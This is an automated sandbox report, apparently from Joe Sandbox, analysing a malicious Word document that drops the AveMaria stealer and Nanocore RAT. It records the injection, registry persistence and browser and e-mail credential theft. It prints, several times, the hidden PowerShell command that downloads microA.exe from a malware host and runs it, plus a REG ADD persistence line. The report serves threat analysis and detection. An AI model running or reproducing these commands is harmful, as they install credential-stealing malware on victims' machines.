Source: C:\ProgramData\images.exe	Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 55D000
Source: C:\ProgramData\images.exe	Memory written: C:\Users\user\AppData\Local\Temp\images.exe base: 7EFDE008
Source: C:\Users\user\AppData\Local\Temp\images.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 120000
Source: C:\Users\user\AppData\Local\Temp\images.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 130000

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe

Source: C:\Users\user\AppData\Local\Temp\images.exe

Code function: 25_2_03C10353 keybd_event,

Source: C:\Users\user\AppData\Local\Temp\images.exe

Code function: 25_2_03C1030F mouse_event,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\microA.exe 'C:\Users\user\AppData\Roaming\microA.exe'
Source: C:\Users\user\AppData\Roaming\microA.exe	Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe	Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Roaming\microA.exe	Process created: C:\Users\user\AppData\Local\Temp\microA.exe C:\Users\user\AppData\Local\Temp\microA.exe
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Users\user\AppData\Local\Temp\images.exe C:\Users\user\AppData\Local\Temp\images.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\images.exe	Process created: C:\Users\user\AppData\Roaming\JhwfHBtD..exe 'C:\Users\user\AppData\Roaming\JhwfHBtD..exe'

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/microA.exe','C:\Users\user\AppData\Roaming\microA.exe');Start-Process 'C:\Users\user\AppData\Roaming\microA.exe''

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_00412E91 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,RegCreateKeyExA,RegCloseKey,SetLastError,

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_00410A8C AllocateAndInitializeSid,LookupAccountSidW,GetLastError,FreeSid,

Source: images.exe	Binary or memory string: GetProgmanWindow
Source: images.exe	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_00410E5E cpuid

Source: C:\Users\user\AppData\Local\Temp\images.exe

Code function: ToAsciiEx,GetLocaleInfoW,WideCharToMultiByte,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE	Queries volume information: C:\Users\user\AppData\Local\Temp\OICE_E3CA6E03-B995-4FF4-BE46-DA58B35F69D7.0\FLDE10.tmp VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\microA.exe	Queries volume information: C:\Users\user\AppData\Roaming\microA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\microA.exe	Queries volume information: C:\Users\user\AppData\Roaming\microA.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\microA.exe	Queries volume information: C:\Users\user\AppData\Roaming\microA.exe VolumeInformation
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT VolumeInformation
Source: C:\ProgramData\images.exe	Queries volume information: C:\ProgramData\images.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Code function: 16_2_00408D0F GetModuleHandleA,SHGetFolderPathW,lstrcatW,lstrcatW,CreateDirectoryW,lstrcpyW,lstrcatW,GetLocalTime,wsprintfW,CreateFileW,CloseHandle,RegisterClassW,CreateWindowExW,GetMessageA,GetMessageA,TranslateMessage,DispatchMessageA,GetMessageA,

Source: C:\Users\user\AppData\Local\Temp\images.exe

Code function: 25_2_03C12AE1 IsSETEnabled,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetVersionExW,RegQueryValueExW,GetVersionExW,RegCloseKey,GetVersionExW,

Source: C:\Users\user\AppData\Roaming\microA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Increases the number of concurrent connection per server for Internet Explorer

Show sources

Source: C:\Users\user\AppData\Local\Temp\microA.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

Stealing of Sensitive Information:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: \Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: \Chromium\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: \Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: \Chromium\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: \Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: \Chromium\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: \Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: \Chromium\User Data\Default\Login Data

Contains functionality to steal e-mail passwords

Show sources

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: POP3 Password
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: SMTP Password
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: IMAP Password
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: POP3 Password
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: SMTP Password
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: IMAP Password
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: POP3 Password
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: SMTP Password
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: IMAP Password
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: POP3 Password
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: SMTP Password
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: IMAP Password

Source: Yara match	File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.microA.exe.2095f04.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2171424499.0000000003369000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.32c94f0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\images.exe

Code function: 25_2_03C18A23 RemoveClipboardFormatListener,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting2	LSASS Driver1	LSASS Driver1	Disable or Modify Tools11	OS Credential Dumping2	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer33	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture121	System Service Discovery1	Remote Desktop Protocol	Input Capture121	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Endpoint Denial of Service1
Domain Accounts	Shared Modules1	Create Account11	Access Token Manipulation1	Scripting2	Credentials In Files1	File and Directory Discovery5	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution33	Windows Service11	Windows Service11	Obfuscated Files or Information2	NTDS	System Information Discovery35	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter11	Registry Run Keys / Startup Folder1	Process Injection622	Software Packing12	LSA Secrets	Security Software Discovery321	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol122	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Service Execution2	Rc.common	Registry Run Keys / Startup Folder1	Masquerading23	Cached Domain Credentials	Virtualization/Sandbox Evasion31	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	PowerShell3	Startup Items	Startup Items	Modify Registry1	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion31	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation1	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection622	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Hidden Users2	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
N40-MR 311.doc	43%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\microA.exe	100%	Joe Sandbox ML
C:\ProgramData\images.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\microA.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\JhwfHBtD..exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\images.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft DN1\sqlmap.dll	20%	Metadefender		Browse
C:\Program Files\Microsoft DN1\sqlmap.dll	43%	ReversingLabs	Win64.Trojan.RDPWrap
C:\ProgramData\images.exe	40%	Metadefender		Browse
C:\ProgramData\images.exe	63%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe	20%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe	40%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe	63%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Users\user\AppData\Local\Temp\images.exe	40%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\images.exe	63%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Users\user\AppData\Local\Temp\microA.exe	40%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\microA.exe	63%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Users\user\AppData\Roaming\JhwfHBtD..exe	20%	ReversingLabs	ByteCode-MSIL.Backdoor.Remcos
C:\Users\user\AppData\Roaming\microA.exe	40%	Metadefender		Browse
C:\Users\user\AppData\Roaming\microA.exe	63%	ReversingLabs	ByteCode-MSIL.Downloader.Seraph
C:\Windows\System32\rfxvmt.dll	0%	Metadefender		Browse
C:\Windows\System32\rfxvmt.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
25.2.images.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
17.2.microA.exe.400000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
16.2.microA.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File
18.2.microA.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen2	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://newhosteeeee.ydns.eu	0%	Avira URL Cloud	safe
http://newhosteeeee.ydns.eu/microA.exe	1%	Virustotal		Browse
http://newhosteeeee.ydns.eu/microA.exe	0%	Avira URL Cloud	safe
http://hutyrtit.ydns.eu/microC.exe	18%	Virustotal		Browse
http://hutyrtit.ydns.eu/microC.exe	100%	Avira URL Cloud	malware
